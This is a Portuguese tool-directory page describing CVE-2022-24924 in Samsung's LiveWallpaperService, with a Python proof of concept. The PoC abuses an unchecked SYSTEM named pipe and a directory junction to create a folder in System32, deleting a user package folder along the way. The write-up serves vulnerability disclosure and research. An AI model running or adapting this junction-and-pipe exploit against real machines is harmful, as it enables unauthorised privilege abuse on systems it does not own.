Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-24924 — Um controle de acesso inadequado no LiveWallpaperService anterior às versões 3.0.9.0 permite criar um diretório específico do sistema com um nome específico sem a permissão adequada. | Kitploit
Ferramentas/GitHubGitHub/heegong/cve-2022-24924
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoExploração de Binários
GitHubheegong/cve-2022-24924

CVE-2022-24924

Um controle de acesso inadequado no LiveWallpaperService anterior às versões 3.0.9.0 permite criar um diretório específico do sistema com um nome específico sem a permissão adequada.

Ver Repositório
2há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidade de controle de acesso inadequado no LiveWallpaperService CVE-2022-24924 (SVE-2021-24089)

Versão do Windows testada: Windows 10 20H2 (Build 19042.1348) 64 bits

Versão do Live Wallpaper: 3.0.9.0 ou anterior

Existe um LiveWallpaperService que opera por padrão em laptops Samsung, mas foi encontrada uma vulnerabilidade que criava o diretório SYSTEM em um diretório com privilégios de SYSTEM no serviço SYSTEM.

O Live Wallpaper geralmente é instalado por padrão em laptops Samsung, mas também é um aplicativo disponível na Microsoft Store. O aplicativo pode ser executado com permissão de Usuário e comunica-se entre o servidor e o cliente por meio de IPC via Named PIPE. Nesse momento, o Servidor PIPE opera com privilégios de SYSTEM e não verifica quem são os clientes.

A seguir está o processo de operação executado quando o aplicativo correspondente é iniciado.

Ao receber a string unicode '33;', o servidor acessa a pasta 'C:\Users{username}\AppData\Local\Packages\Sidia.LiveWallpaper_wkpx6gdq8qyz8' e verifica a existência do diretório LiveWallpaperData. Um novo diretório do sistema de arquivos é criado no diretório com o nome 'LiveWallpaperData'.

O Named PIPE é usado para comunicação entre processos. Como não há inspeção separada do cliente, o atacante pode abri-lo diretamente e enviar os dados desejados.

Primeiro, após abrir o Named PIPE diretamente, crie uma junção de diretório para C:\Windows\System32 usando o symboliclink-testing-tools produzido por james forshaw. Ela é criada como um subdiretório do diretório System32 com privilégios.

Aqui está o PoC para essa vulnerabilidade.

Para executar o PoC, as seguintes condições devem ser atendidas:

  1. Basicamente, o LiveWallpaperService deve estar em execução no Windows.
  2. O arquivo executável CreateMountPoint.exe e o arquivo executável DeleteMountPoint.exe, compilados usando o symboliclink-testing-tools produzido por james forshaw, devem existir no mesmo diretório do PoC.
root@kitploit:~
# python 3.7.2
import os
import shutil
import time
import getpass

def stringToWstring(st : str) -> str:
    result = ''
    for i in st:
        result += i+'\x00'
    return result

def main():
    # current user name
    username = getpass.getuser()

    # path settings
    path1 = f'C:\\Users\\{username}\\AppData\\Local\\Packages\\Sidia.LiveWallpaper_wkpx6gdq8qyz8'
    path2 = 'C:\\Windows\\System32'

    # delete directory
    if os.path.isdir(path1):
        shutil.rmtree(path1)

    # create directory junction
    command = f'CreateMountPoint.exe "{path1}" "{path2}"'
    os.system(command)

    # write data to named pipe
    with open('\\\\.\\pipe\\LiveWallpaperPipe', 'a') as f:
        f.write(stringToWstring('33;'))

    # IPC delay time
    time.sleep(2)

    # directory check
    if os.path.isdir(path2+'\\LiveWallpaperData'):
        print('[+] Success')
    else:
        print('[-] failed')

    # delete directory junction
    command = f'DeleteMountPoint.exe {path1}'
    os.system(command)
    shutil.rmtree(path1)

if __name__=='__main__':
    main()

https://user-images.githubusercontent.com/57859128/166858916-1f0b9f9a-6935-452d-8b38-18828beace0f.mp4

Baixar ferramenta